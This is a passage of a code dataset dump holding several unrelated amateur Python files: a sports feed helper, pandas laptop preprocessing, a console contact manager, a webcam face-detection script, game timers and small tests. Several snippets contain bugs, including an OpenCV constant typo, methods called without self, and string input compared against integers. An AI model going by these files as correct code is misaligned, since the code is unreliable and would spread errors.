fgMask=logo_img[...,3], coords=(center_x, 0)\n    )\n    cv2.imwrite(f'./static/grads/{team_name}.jpg', grad_with_logo)\n    return f'http://95.213.37.132:5000/static/grads/{team_name}.jpg'\n\n\ndef return_feed_info(team_name):\n    global matches_info_global\n    global teams_info_global\n    teams_info = teams_info_global\n    matches_info = matches_info_global\n#    grad_with_logo_link = return_gradient(teams_info, team_name)\n    team_id = teams_info[team_name]['id']\n    team_matches = matches_info[\n        (matches_info['home_team_id'] == team_id) | (matches_info['away_team_id'] == team_id)\n    ]\n    team_matches = team_matches[\n        (team_matches['home_score'] != 0) & (team_matches['away_score'] != 0)\n    ]\n    team_matches.sort_values('match_start_time', ascending=False, inplace=True)\n    matches_for_feed = team_matches.iloc[:2, :]\n    result_list = []\n    for row_match in matches_for_feed.iterrows():\n        score_comment = ''\n        match = row_match[1]\n        if team_id == match['home_team_id']:\n            won = match['home_score'] > match['away_score']\n            draw = match['home_score'] == match['away_score']\n        elif team_id == match['away_team_id']:\n            won = match['away_score'] > match['home_score']\n            draw = match['away_score'] == match['home_score']\n        score_comment = 'Победа!' if won else ('Ничья!' if draw else 'Проигрыш.')\n        score_comment += f' \\nФинальный счет: {match[\"home_score\"]} -- {match[\"away_score\"]}'\n        score_comment += ' 🎉' if won else (' 😕' if draw else ' 😔')\n        show_home_name = match[\"home_team_name\"].split(' ')[0]\n        show_away_name = match[\"away_team_name\"].split(' ')[0]\n        result_list.append([\n            f'{show_home_name} -- {show_away_name}',\n            score_comment\n        ])\n    return result_list\n","sub_path":"back/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279574911","text":"class Member:\n    \n    def __init__(self, name, score, hole, add_score=0, center_skill=''):\n        self.name = name\n        self.score = score\n        self.added = score\n        self.hole = hole\n        self.center_skill = center_skill\n        self.add_score = add_score\n        self.team = self.get_team()\n        self.grade = self.get_grade()\n        self.unit = self.get_unit()\n    \n    def __str__(self):\n        return self.name + '_' + str(self.score)\n    \n    def __del__(self):\n        pass\n        #print('delete ' + self.__str__())\n    \n    def __dict__(self):\n        return {}\n    \n    def get_team(self):\n        name = self.name.split('_')[1].lower()\n        if name in ('maki', 'rin', 'hanayo', 'honoka', 'kotori', 'umi', 'nico', 'eli', 'nozomi'):\n            return \"µ's\"\n        elif name in ('ruby', 'hanamaru', 'yoshiko', 'chika', 'you', 'riko', 'kanan', 'dia', 'mari'):\n            return 'Aqours'\n        else: raise Exception('member name error')\n\n    def get_grade(self):\n        name = self.name.split('_')[1].lower()\n        if name in ('maki', 'rin', 'hanayo', 'ruby', 'hanamaru', 'yoshiko'):\n            return 1\n        elif name in ('honoka', 'kotori', 'umi', 'chika', 'you', 'riko'):\n            return 2\n        elif name in ('nico', 'eli', 'nozomi', 'kanan', 'dia', 'mari'):\n            return 3\n        else: raise Exception('member name error')\n\n    def get_unit(self):\n        name = self.name.split('_')[1].lower()\n        if name in ('honoka', 'kotori', 'hanayo'):\n            return 'Printemps'\n        elif name in ('nico', 'eli', 'maki'):\n            return 'BiBi'\n        elif name in ('umi', 'rin', 'nozomi'):\n            return 'lily white'\n        elif name in ('chika', 'you', 'ruby'):\n            return 'CYaRon!'\n        elif name in ('kanan', 'dia', 'hanamaru'):\n            return 'AZALEA'\n        elif name in ('riko', 'yoshiko', 'mari'):\n            return 'Guilty Kiss'\n        else: raise Exception('member name 
error')","sub_path":"Member.py","file_name":"Member.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"599966776","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 22 15:51:29 2018\n\n@author: qgqg2\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 21 00:26:44 2018\n\n@author: gjrm2\n\"\"\"\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport collections\n\n# utf-8 encoding error, so I take 'cp1252'\ndf = pd.read_csv('laptops.csv', encoding= \"cp1252\")\ndf.shape\ndf = df.drop('Unnamed: 0',1)\n# Drop the useless column!!\n\ndf['Cpu_modified'] = df.Cpu.apply(lambda e: e.split()[2])\ndf['Cpu_Clock'] = df.Cpu.apply(lambda e: e.split()[-1])\ndf['Cpu_Clock'] = df.Cpu_Clock.apply(lambda x: x[0: -3])\ndf['Cpu_Clock'] = df['Cpu_Clock'].apply(pd.to_numeric)\ndf.loc[(df[\"Cpu_modified\"] != 'i3') & (df[\"Cpu_modified\"] != 'i5') & (df[\"Cpu_modified\"] != 'i7'), \"Cpu_modified\"] = -1\ndf.loc[df[\"Cpu_modified\"] == 'i3', \"Cpu_modified\"] =3 + df[\"Cpu_Clock\"]/4\ndf.loc[df[\"Cpu_modified\"] == 'i5', \"Cpu_modified\"] =5 + df[\"Cpu_Clock\"]/4\ndf.loc[df[\"Cpu_modified\"] == 'i7', \"Cpu_modified\"] =7 + df[\"Cpu_Clock\"]/4\ndf['Cpu_modified'] = df['Cpu_modified'].apply(pd.to_numeric)\n# Turn the CPU column into a numeric priority score\n\ndf['Ram_modified'] = df.Ram.apply(lambda x: x[0:-2])\ndf['Ram_modified'] = df['Ram_modified'].apply(pd.to_numeric, errors = 'coerce')\n# Score the RAM column\n\ndf['weight_modified'] = df.Weight.apply(lambda x: x[0:-2])\ndf['weight_modified'] = df['weight_modified'].apply(pd.to_numeric)\n# Score the Weight column\ndf['Screen_modified'] = df.ScreenResolution.apply(lambda e: e.split()[-1])\ndf['Screen_modified'] = df.Screen_modified.apply(lambda x: x[0:4])\ndf['Screen_modified'] = df['Screen_modified'].apply(pd.to_numeric)\ndf[\"Screen_modified\"] = df[\"Screen_modified\"]/100\n# Score the screen-resolution column\n\ndf['Memory_temp'] = df.Memory.apply(lambda e: e.split()[1])\ndf['Memory_SSD'] = df['Memory_temp']\ndf['Memory_SSD'].fillna(0)\ndf.loc[df['Memory_temp'] == 'SSD' ,\"Memory_SSD\"] = df['Memory'].apply(lambda e: e.split()[0])\ndf.loc[df['Memory_temp'] != 'SSD', \"Memory_SSD\"] = '-1GB'\ndf['Memory_SSD'] = df.Memory_SSD.apply(lambda x :x[0:-2])\ndf.loc[df['Memory_SSD'] == '1' ,\"Memory_SSD\"] = '1024'\ndf['Memory_SSD'] = df['Memory_SSD'].apply(pd.to_numeric)\n\ndf['Memory_HDD'] = df['Memory_temp']\ndf['Memory_HDD'].fillna(0)\ndf.loc[df['Memory_temp'] == 'HDD' ,\"Memory_HDD\"] = df['Memory'].apply(lambda e: e.split()[0])\ndf.loc[df['Memory_temp'] != 'HDD', \"Memory_HDD\"] = '-1GB'\ndf['Memory_HDD'] = df.Memory_HDD.apply(lambda x :x[0:-2])\ndf.loc[df['Memory_HDD'] == '1' ,\"Memory_HDD\"] = '1024'\ndf['Memory_SSD'] = df['Memory_SSD'].apply(pd.to_numeric)\n# Preprocess the storage columns\n\nCorr = df.corr()\n\n# Read the CSV file","sub_path":"[0722_현수]Naver_DSC2018/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467137165","text":"'''\r\nCreated on Feb 10, 2014\r\n\r\n@author: Yongha\r\n'''\r\nimport re\r\ndef main():\r\n    rrnPattern = re.compile('(^|\\D)\\d{7}($|\\D)')\r\n    myString= '0123456'\r\n    mym = rrnPattern.match(myString)\r\n    if mym:\r\n        print(mym.group(0))\r\n    else:\r\n        print(\"no match\")\r\n    \r\nif __name__ == '__main__':\r\n    
main()","sub_path":"WD_Nesting/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386932270","text":"from django.test import TestCase\nfrom bookmarks.models import Bookmark, BookmarkTag\n\n\nclass BookMarkModelTest(TestCase):\n\n    def test_saving_and_retrieving_bookmark(self):\n        first_bookmark = Bookmark()\n        first_bookmark.name = \"google\"\n        first_bookmark.url = \"https://www.google.com\"\n        first_bookmark.save()\n\n        second_bookmark = Bookmark()\n        second_bookmark.name = \"facebook\"\n        second_bookmark.url = \"https://www.facebook.com\"\n        second_bookmark.save()\n\n        saved_bookmarks = Bookmark.objects.all()\n        self.assertEqual(saved_bookmarks.count(), 2)\n        first_saved_bookmark = saved_bookmarks[0]\n        second_saved_bookmark = saved_bookmarks[1]\n        self.assertEqual(first_saved_bookmark.name, \"google\")\n        self.assertEqual(second_saved_bookmark.name, \"facebook\")\n","sub_path":"everbookmarks/bookmarks/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"604793359","text":"# Team 1: Jonathan Kaufmann, Urjii Tahir, Mark Fasano\n# Csc 280\n# 11/30/2016\n# Final Project\n\nfrom datetime import datetime\nimport pickle\n\nclass Contact():\n    '''contacts object'''\n    def __init__(self, name, group, phone = '', address = '', fax = '', email = '', company = '', position = '', note = ''):\n        '''initializes contact object'''\n        # team contribution\n        self.name = name\n        self.group = group\n        self.phone = phone\n        self.address = address\n        self.fax = fax\n        self.email = email\n        self.corp = company\n        self.position = position\n        self.note = note\n\n    def helper(self):\n        '''help functionality for user'''\n        print(\"Enter e to edit contact info\")\n        print(\"Enter se to send an email to contact\")\n        print(\"Enter st to send text message to contact\")\n        print(\"Enter d to display contact info\")\n        print(\"Enter x to exit\")\n\n\n    def changer(self, ui, same):\n        '''ui for editing item'''\n        # team contribution\n        ui = ui.lower()\n        # offer to change if y\n        if ui == 'y':\n            ui1 = input(\"Input the new item: \")\n            return ui1\n        # keep same otherwise\n        else:\n            return same\n\n\n    def editContact(self):\n        '''edits a contact'''\n        ui1 = input(\"Would you like to change the name? (y/n): \")\n        self.name = self.changer(ui1, self.name)\n        #group input\n        ui = input(\"Input 1 for friend, 2 for family, 3 for professional: \")\n        if ui == '1':\n            self.group = 'friend'\n        elif ui == '2':\n            self.group = 'family'\n        elif ui == '3':\n            self.group = 'professional'\n        # phone number input\n        ui1 = input(\"Would you like to change the phone number? (y/n): \")\n        self.phone = self.changer(ui1, self.phone)\n        #address input\n        ui1 = input(\"Would you like to change the address? (y/n): \")\n        self.address = self.changer(ui1, self.address)\n        #fax input\n        ui1 = input(\"Would you like to change the fax? (y/n): \")\n        self.fax = self.changer(ui1, self.fax)\n        #email input\n        ui1 = input(\"Would you like to change the email? (y/n): \")\n        self.email = self.changer(ui1, self.email)\n        #company input\n        ui1 = input(\"Would you like to change the company? (y/n): \")\n        self.corp = self.changer(ui1, self.corp)\n        # position input\n        ui1 = input(\"Would you like to change the company position? (y/n): \")\n        self.position = self.changer(ui1, self.position)\n        #note input\n        ui1 = input(\"Would you like to change the note? 
(y/n): \")\n self.note = changer(ui1, self.note)\n\n\n\n def sendEmail(self):\n '''formats email for sending'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = self.email\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n \n\n\n def sendMessage(self):\n '''formats text for sending'''\n #get input\n rec = self.phone\n text = input(\"Input text: \")\n #print to user\n print(\"Recipient: \" + rec)\n print(\"Text: \" + text)\n # export to mailer software\n return (rec, text)\n \n\n\n def display(self):\n '''displays contact info'''\n print(\"Name: \" + self.name)\n print(\"Relation: \" + self.group)\n print(\"Phone: \" + self.phone)\n print(\"Email: \" + self.email)\n print(\"Company: \" + self.corp)\n print(\"Position: \" + self.position)\n print(\"Address: \" + self.address)\n print(\"Fax: \" + self.fax)\n print(\"Personal Note: \" + self.note)\n\n \nclass Company():\n '''creates company info and directory for employees'''\n def __init__(self, name, industry, phone, email, address, fax):\n '''initializes attributes'''\n # team contribution\n self.name = name\n self.ind = industry\n self.phone = phone\n self.email = email\n self.address = address\n self.fax = fax\n self.emps = {}\n\n def edit(self):\n '''edits company'''\n # name input\n ui1 = input(\"Would you like to change the name? (y/n): \")\n self.name = changer(ui1, self.name)\n self.merger()\n # industry input\n ui1 = input(\"Would you like to change the industry? (y/n): \")\n self.ind = changer(ui1, self.ind)\n # phone number input\n ui1 = input(\"Would you like to change the phone number? (y/n): \")\n self.phone = changer(ui1, self.phone)\n #address input\n ui1 = input(\"Would you like to change the address? (y/n): \")\n self.address = changer(ui1, self.address)\n #fax input\n ui1 = input(\"Would you like to change the fax? (y/n): \")\n self.fax = changer(ui1, self.fax)\n #email input\n ui1 = input(\"Would you like to change the email? 
(y/n): \")\n self.email = changer(ui1, self.email)\n \n\n \n def changer(self, ui, same):\n '''ui for editing item'''\n # team contribution\n ui.lower()\n # offer to change if y\n if ui == 'y':\n ui1 = input(\"Input the new item: \")\n return ui1\n # keep same otherwise\n else:\n return same\n\n def add(self, contact):\n '''adds contact'''\n self.emps[contact.name] = contact\n contact.corp = self.name\n\n\n def sendEmail(self):\n '''formats email for sending'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = self.email\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n\n\n def sendAll(self):\n '''formats email to all employees'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = []\n for emp in self.emps:\n rec.append(self.emps[emp].email)\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n\n def fire(self, contact):\n '''removes employee from company list'''\n del self.emps[contact.name]\n contact.corp = ''\n\n\n def fireAll(self):\n '''removes all employees from list'''\n for emp in self.emps:\n emp.corp = ''\n self.emps = {}\n\n def directory(self):\n '''displays directory'''\n print(self.name + \" Directory of Employees:\")\n for emp in self.emps:\n print(\"Name: \" + self.emps[emp].name + ' Position: ' + self.emps[emp].position)\n\n def display(self):\n '''displays company info'''\n print(\"Name: \" + self.name)\n print(\"Industry: \" + self.ind)\n print(\"Phone: \" + self.phone)\n print(\"Email: \" + self.email)\n print(\"Address: \" + self.address)\n print(\"Fax: \" + self.fax)\n\n def merger(self):\n '''changes emps company name if name changes'''\n for emp in self.emps:\n self.emps[emp].corp = self.name\n\n def helper(self):\n '''help functionality for user'''\n print(\"Enter e to edit company info\")\n print(\"Enter se to send email to company\")\n print(\"Enter sa to send email to all employees\")\n print(\"Enter d to display company information\")\n print(\"Enter dir to display company directory\")\n print(\"Enter x to exit\")\n\n\n\nclass Manage():\n '''management system for contacts'''\n def __init__(self, contacts = {}, corps = {}, friends = {}, family = {}, profs ={}):\n '''initializes with lists of contacts, contacts by group, list of companies'''\n # team contribution\n self.contacts = contacts\n self.corps = corps\n self.friends = friends\n self.family = family\n self.profs = profs\n self.count = self.counter()\n if self.count == None:\n self.count = 0\n\n\n def addContact(self):\n '''adds new contact'''\n # team contribution\n # must input name, group\n # optional input number email address fax company position personal note\n #name input\n name = input(\"Name: \")\n #group input\n ui = int(input(\"Input 1 for friend, 2 for family, 3 for professional: \"))\n if ui == 1:\n group = 'friend'\n elif ui == 2:\n group = 'family'\n elif ui == 3:\n group = 'professional'\n # phone number input\n ui1 = input(\"Would you like to input a phone number? (y/n): \")\n if ui1 == 'y':\n phone = input(\"Phone number: \")\n else:\n phone = ''\n #address input\n ui2 = input(\"Would you like to input an address? (y/n): \")\n if ui2 == 'y':\n address = input(\"Address: \")\n else:\n address = ''\n #fax input\n ui3 = input(\"Would you like to input a fax? 
(y/n): \")\n if ui3 == 'y':\n fax = input(\"Fax: \")\n else:\n fax = ''\n #email input\n ui4 = input(\"Would you like to input an email? (y/n): \")\n if ui4 == 'y':\n email = input(\"Email: \")\n else:\n email = ''\n #company input\n ui5 = input(\"Would you like to input a company? (y/n): \")\n if ui5 == 'y':\n company = input(\"Company: \")\n ui52 = input(\"Would you like to input their position in the company? (y/n): \")\n if ui52 == 'y':\n position = input(\"Position: \")\n else:\n position = ''\n else:\n company = ''\n position = ''\n #note input\n ui6 = input(\"Would you like to input a personal note? (y/n): \")\n if ui6 == 'y':\n note = input(\"Note: \")\n else:\n note = ''\n #create and add to lists\n new_contact = Contact(name, group, phone, address, fax, email, company, position, note)\n self.contacts[new_contact.name] = new_contact\n # add to group list\n if group == \"friend\":\n self.friends[new_contact.name] = new_contact\n elif group == \"family\":\n self.family[new_contact.name] = new_contact\n else:\n self.profs[new_contact.name] = new_contact\n # add to company\n if company in self.corps.keys():\n self.corps[company].add(new_contact)\n self.count += 1\n\n\n def addCorp(self):\n '''adds new company'''\n name = input(\"Company Name: \")\n ind = input(\"Industry: \")\n # phone number input\n ui1 = input(\"Would you like to input a phone number? (y/n): \")\n if ui1 == 'y':\n phone = input(\"Phone number: \")\n else:\n phone = ''\n #address input\n ui2 = input(\"Would you like to input an address? (y/n): \")\n if ui2 == 'y':\n address = input(\"Address: \")\n else:\n address = ''\n #fax input\n ui3 = input(\"Would you like to input a fax? (y/n): \")\n if ui3 == 'y':\n fax = input(\"Fax: \")\n else:\n fax = ''\n #email input\n ui4 = input(\"Would you like to input an email? 
(y/n): \")\n if ui4 == 'y':\n email = input(\"Email: \")\n else:\n email = ''\n # add new\n new_corp = Company(name, ind, phone, email, address, fax)\n self.corps[name] = new_corp\n # add employees\n for con in self.contacts:\n if self.contacts[con].corp == name:\n new_corp.add(self.contacts[con])\n \n \n\n def delCorp(self):\n '''deletes corp'''\n name = input(\"Input name of corporation to delete: \")\n com = self.corps[name]\n com.fireAll()\n del self.corps[name]\n\n\n def delContact(self):\n '''deletes contact'''\n name = input(\"Input name of contact to delete: \")\n corp = self.contacts[name].corp\n # delete contact\n del self.contacts[name]\n # delete from ancillary lists\n if name in self.friends.keys():\n del self.friends[name]\n elif name in self.family.keys():\n del self.family[name]\n elif name in self.profs.keys():\n del self.profs[name]\n if corp in self.corps.keys():\n del self.corps[corp].emps[name]\n self.count -= 1\n\n def clearContacts(self):\n '''clears system'''\n self.contacts = {}\n self.corps = {}\n self.friends = {}\n self.family = {}\n self.profs = {}\n self.count = 0\n\n def group_selector(self):\n '''chooses group'''\n print(\"Which group would you like to select?\")\n ui = input(\"Input 1 for friend, 2 for family, 3 for professional: \")\n return ui\n\n def displayGroup(self):\n '''goes through group'''\n ui = self.group_selector()\n #friends\n if ui == 1:\n print(\"Friend Contacts:\")\n for friend in self.friends:\n print(self.friends[friend].name)\n #family\n if ui == 2:\n print(\"Family Contacts:\")\n for fam in self.family:\n print(self.family[fam].name)\n #professional contacts\n if ui == 3:\n print(\"Professional Contacts\")\n for prof in self.profs:\n print(self.profs[prof].name)\n\n def searchName(self):\n '''searches contact by name'''\n name = input(\"Input company name to search: \")\n person = self.contacts[name]\n self.conControl(person)\n\n def searchCorp(self):\n '''searches company by company name'''\n name = input(\"Input company name to search: \")\n corp = self.corps[name]\n self.corpControl(corp)\n\n \n def sendGroup(self):\n '''send mass email to group'''\n ui = self.group_selector()\n rec = \"To: \"\n rec_list = []\n #friends\n if ui == 1:\n for friend in self.friends:\n rec += friend.email + \", \"\n rec_list += friend.email\n #family\n if ui == 2:\n for fam in self.family:\n rec += fam.email + \", \"\n rec_list += fam.email\n #professional contacts\n if ui == 3:\n for prof in self.profs:\n rec += prof.email + \", \"\n rec_list += prof.email\n # get input\n sub = input(\"Subject: \")\n text = input(\"Body: \")\n # print\n print(rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + text)\n # export to mailer\n return (rec_list, sub, text)\n \n def count(self):\n '''counts contacts'''\n return self.count\n\n def counter(self):\n '''initializes count'''\n self.count = len(self.contacts)\n\n def saver(self):\n '''creates dict for pickling'''\n save = {\"cons\": self.contacts, \"corps\" : self.corps, \"friends\" : self.friends,\n \"fam\" : self.family, \"profs\" : self.profs}\n return save\n\n def corpControl(self, corp):\n '''control module for corporations'''\n print(\"Corporation: \" + corp.name)\n print(\"Enter h for help\")\n while True:\n ui = input(\"Input command: \")\n ui.lower()\n # exit\n if ui == 'x':\n return None\n # help\n elif ui == 'h':\n corp.helper()\n # edit\n elif ui == 'e':\n corp.edit()\n # send email\n elif ui == 'se':\n corp.sendEmail()\n # send email to email\n elif ui == 'sa':\n corp.sendAll()\n # display 
directory\n            elif ui == 'dir':\n                corp.directory()\n            # display info\n            elif ui == 'd':\n                corp.display()\n            # dumb user\n            else:\n                print(\"Improper command, type h for help\")\n\n    \n\n    def conControl(self, con):\n        '''control module for contacts'''\n        print(\"Name: \" + con.name)\n        print(\"Enter h for help\")\n        while True:\n            ui = input(\"Input command: \")\n            ui = ui.lower()\n            # exit\n            if ui == 'x':\n                return None\n            # helper\n            elif ui == 'h':\n                con.helper()\n            # edit\n            elif ui == 'e':\n                con.editContact()\n            # send email\n            elif ui == 'se':\n                con.sendEmail()\n            # send text\n            elif ui == 'st':\n                con.sendMessage()\n            # display contact info\n            elif ui == 'd':\n                con.display()\n            # dumb user\n            else:\n                print(\"Improper command, type h for help\")\n\ndef helper():\n    \"\"\"help functionality\"\"\"\n    print(\"Type a to add a contact or corporation\")\n    print(\"Type d to delete a contact or corporation\")\n    print(\"Type dis to display contact names in a group\")\n    print(\"Type s to search contacts or corporations and modify them\")\n    print(\"Type e to send an email to a group\")\n    print(\"Type c to show how many contacts you have\")\n    print(\"Type save to save for later\")\n    print(\"Type l to load a contact list\")\n    print(\"Type x to exit\")\n\ndef save(man):\n    \"\"\"saves contact system for later\"\"\"\n    pickle.dump( man, open( \"save.p\", \"wb\" ) )\n\ndef load():\n    \"\"\"loads contact system\"\"\"\n    return pickle.load( open( \"save.p\", \"rb\" ) )\n    \n\ndef main():\n    \"\"\"main functionality control\"\"\"\n    # initialize load checker\n    save_ui = input(\"Do you have a previous contact list to load? (y/n): \")\n    save_ui = save_ui.lower()\n    if save_ui == 'y':\n        man = load()\n    else:\n        man = Manage()\n    print(\"initializing...\")\n    print(\"Welcome to Contact Manager for Ford Enterprises\")\n    print(\"Input command or type h for help\")\n    #loop\n    while True:\n        ui = input(\"Input command: \")\n        ui = ui.lower()\n        # exit\n        if ui == 'x':\n            return None\n        # help\n        elif ui == 'h':\n            helper()\n        # send email to whole group\n        elif ui == 'e':\n            man.sendGroup()\n        # saves\n        elif ui == 'save':\n            man.saver()\n            save(man)\n        # add contact or corporation\n        elif ui == 'a':\n            ui1 = input(\"Input 1 to add contact or 2 to add corporation: \")\n            if ui1 == '1':\n                man.addContact()\n            if ui1 == '2':\n                man.addCorp()\n        # delete contact or corporation\n        elif ui == 'd':\n            ui1 = input(\"Input 1 to delete contact or 2 to delete corporation: \")\n            if ui1 == '1':\n                man.delContact()\n            if ui1 == '2':\n                man.delCorp()\n        # display group names\n        elif ui == 'dis':\n            man.displayGroup()\n        # search contact or corps by names\n        elif ui == 's':\n            ui1 = input(\"Input 1 to search contact or 2 to search corporation: \")\n            if ui1 == '1':\n                man.searchName()\n            if ui1 == '2':\n                man.searchCorp()\n        # shows count of contacts\n        elif ui == 'c':\n            count = str(man.count)\n            print(\"You have: \" + count+ \" contacts.\")\n        # load management system\n        elif ui == 'l':\n            man = load()\n        # dumb user\n        else:\n            print(\"Incorrect command, enter h for help.\")\n\nif __name__ == '__main__':\n    \"\"\"initialize the thingy\"\"\"\n    main()\n    \n\n    \n\n\n","sub_path":"9841_Final.py","file_name":"9841_Final.py","file_ext":"py","file_size_in_byte":19924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135825227","text":"#haarcascade-eye.xml --> eye detection\n#haarcascade-frontalface-default.xml --> face detection\n#the video must not have audio\n\nimport cv2\nimport imageio\n\nface_cascade = cv2.CascadeClassifier(\"haarcascade-frontalface-default.xml\")\neye_cascade = 
cv2.CascadeClassifier(\"haarcascade-eye.xml\")\n#filtre serisini tanımladık\n\ndef detect(frame):\n gray = cv2.cvtColor(frame,cv2.qCOLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n gray_face = gray[y:y+h,x:x+w]\n color_face = frame[y:y+h,x:x+w]\n eyes = eye_cascade.detectMultiScale(gray_face,1.1,3)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(color_face,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n return frame\n\nvideo_capture = cv2.VideoCapture(0)\nwhile True:\n _,frame = video_capture.read()\n canvas = detect(frame)\n cv2.imshow('Video',canvas)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","sub_path":"face_det_webcam.py","file_name":"face_det_webcam.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18357049","text":"from itertools import cycle\nfrom pygame.time import Clock, get_ticks\nfrom random import uniform\n\n\n__all__ = ('EventTriggerConstant', 'EventTriggerCountDown', 'EventTrigger',\n 'MsHoldTrigger', 'MsCountdownTrigger', 'MsDelayTrigger')\n\n\n# Note: Switch the delta timer to consumer based delta timer\n# Needs total rework on the game logic\nclass DeltaTimer(object):\n\n __dt_clock = Clock()\n __dt_ticks = get_ticks\n\n dt_deltas = {'delta_ms': 0,\n 'ticks': 0}\n\n @classmethod\n def dt_tick(cls, limit_fps=0, ignore_delta=0):\n dt = cls.__dt_clock.tick(limit_fps) / 1000.0\n ticks = cls.__dt_ticks() \n if not ignore_delta:\n cls.dt_deltas['delta_ms'] = min(0.025, dt) # Lock delta from going below delta of 40fps\n cls.dt_deltas['ticks'] = ticks\n\n return 0\n\n @classmethod\n def dt_fps(cls): return cls.__dt_clock.get_fps()\n\n @classmethod\n def dt_getDelta(cls): return cls.dt_deltas['delta_ms']\n\n @classmethod\n def dt_getTicks(cls): return cls.dt_deltas['ticks'] \n\n\n\nclass MsCountdownTrigger(DeltaTimer):\n __slots__ = 'ms'\n\n def __init__(self, ms, ret_type=0):\n self.ms = ms \n self.ret_type = ret_type # What to do when timer reaches 0\n\n def isDone(self):\n if self.ms <= 0:\n if self.ret_type: return 0\n else: raise StopIteration\n \n self.ms -= self.dt_deltas['delta_ms']\n return 1\n\n\n\nclass MsDelayTrigger(DeltaTimer):\n __slots__ = 'dms', 'ms'\n\n def __init__(self, delay_ms):\n self.dms = delay_ms # Default timer value\n self.ms = delay_ms # Active timer\n\n def isReady(self):\n if self.ms <= 0: \n self.ms = self.dms\n return 1\n \n self.ms -= self.dt_deltas['delta_ms']\n return 0\n\n\n\nclass MsHoldTrigger(DeltaTimer):\n\n __dt_uniform = uniform\n\n def __init__(self, delay_ms, state=1, random_time=False):\n # Default timer value\n self.dms = delay_ms \n \n # Active timer\n self.ms = self.__dt_uniform(0, delay_ms) if random_time else delay_ms\n \n # Bool state for the timer\n self.ready = state \n\n # Default state for the timer\n self.dstate = state \n\n\n def isReady(self, release=0):\n if release and self.ready:\n state = self.ready\n self.ready = 0\n return state\n\n if self.ready: return 0\n\n self.ms -= self.dt_deltas['delta_ms']\n if self.ms <= 0: \n self.ready = 1\n self.ms = self.dms \n\n def reset(self):\n self.ms = self.dms; self.ready = self.dstate\n\n\n\n\n# --------------------------------\n\n\nclass EventTriggerConstant(object):\n\n __slots__ = ('delay', 'default', 'ready', 'timer')\n\n def __init__(self, delay, state=1):\n self.delay = delay \n \n self.default = state\n 
self.ready = state\n        \n        self.timer = 0\n\n    \n    def isReady(self, increment=1, release=0):\n        \"\"\"\n        Tick the timer every time this function is called,\n        and when the timer is greater than or equal to delay, set ready True\n\n        increment -> Timer increment (default: once every frame) \n        release -> if 'True' release the internal state\n\n        return -> bool\n\n        \"\"\"\n        if release and self.ready:\n            state = self.ready\n            self.ready = 0 \n            return state\n        \n        if self.ready: return 0\n        \n        self.timer += increment\n        if self.timer >= self.delay:\n            self.ready = 1; self.timer = 0\n\n    def reset(self): self.timer = 0; self.ready = self.default\n\n\n# --------------------------------\n\n\nclass EventTriggerCountDown(object):\n    \"\"\"\n    Creates a countdown trigger which raises a StopIteration exception when the generator has been exhausted\n    \"\"\"\n\n    __slots__ = ('countdown')\n\n    def __init__(self, countDown):\n        # Technically doesn't 'countdown' \n        self.countdown = iter(xrange(countDown))\n\n    def isDone(self):\n        \"\"\"\n        This function should be called inside a try/except block to catch the StopIteration exception\n\n        return -> None\n\n        \"\"\"\n        # Keep .nexting till StopIteration is raised\n        self.countdown.next()\n\n\n# --------------------------------\n\n\nclass EventTrigger(object):\n    \"\"\"\n    Creates a timer generator which pulses True when the delay (scene count) has been reached\n    and starts from the beginning\n\n    \"\"\"\n    \n    tk_cycle = cycle\n\n    __slots__ = ('timer')\n\n    def __init__(self, delay):\n        self.timer = self.tk_cycle(self.cGenerator(delay))\n    \n    \n    @classmethod\n    def cGenerator(cls, delay):\n        \"\"\"\n        Creates a generator with the first value 1 and 0 for the rest of the delay\n\n        return -> Generator (bool)\n        \n        \"\"\"\n        yield 1\n        for _ in xrange(delay - 1): yield 0 \n        \n\n    def getReady(self):\n        \"\"\"\n        Return the bool state from the generator,\n        pulsing 'True' between the delays\n\n        return -> bool\n\n        \"\"\"\n        return self.timer.next()\n    ","sub_path":"Timer.py","file_name":"Timer.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88375226","text":"from rest_framework.test import APIClient\nfrom testing.testcases import TestCase\nfrom 